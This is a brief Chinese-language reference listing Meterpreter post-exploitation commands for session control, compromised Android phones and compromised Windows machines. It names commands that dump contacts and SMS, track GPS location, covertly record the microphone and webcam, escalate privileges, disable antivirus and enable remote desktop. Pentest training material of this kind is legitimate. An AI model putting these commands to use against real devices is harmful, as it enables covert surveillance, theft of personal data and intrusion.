meterpreter作为漏洞溢出后的攻击载荷使用。
meterpreter基本命令:
代码语言:javascript复制help 查看Meterpreter帮助
background 返回,把meterpreter后台挂起
bgkill 杀死一个 meterpreter 脚本
bglist 提供所有正在运行的后台脚本的列表
bgrun 作为一个后台线程运行脚本
channel 显示活动频道
sessions 列出所有会话
sessions -h 查看session其他命令
close 关闭通道
exit 终止 meterpreter 会话
quit 终止 meterpreter 会话
interact id 切换进一个信道
irb 进入 Ruby 脚本模式
read 从通道读取数据
write 将数据写入到一个通道
use 加载 meterpreter 的扩展
load/use 加载模块
Resource 执行一个已有的rc脚本安卓命令:
代码语言:javascript复制dump_contacts 获取通讯录
dump_sms 获取短信记录
send_sms -d 10086 -t 'hello' 给10086发短信
geolocate 获取手机GPS定位信息
wlan_geolocate 获取手机WIFI信息
record_mic -d 10 录音10秒
webcam_list 获取摄像头
webcam_snap 控制手机拍照
webcam_stream 控制手机视频Windows命令:
代码语言:javascript复制shell 获取一个shell
ps 查看进程
getpid 查看当前进程号
run post/windows/gather/checkvm 查看是否为虚拟机
route 查看完整网络设置
getuid 查看当前权限
getsystem 自动提权
run post/windows/manage/killav 关闭杀毒软件
run post/windows/manage/enable_rdp 启动远程桌面协议
run post/windows/gather/enum_logged_on_users 列举当前登录的用户
run post/windows/gather/enum_applications 查看当前应用程序
record_mic -d 10 录音10秒
load espia 截图
screengrab 截图
webcam_list 获取摄像头
webcam_snap 控制电脑拍照
webcam_stream 控制电脑视频
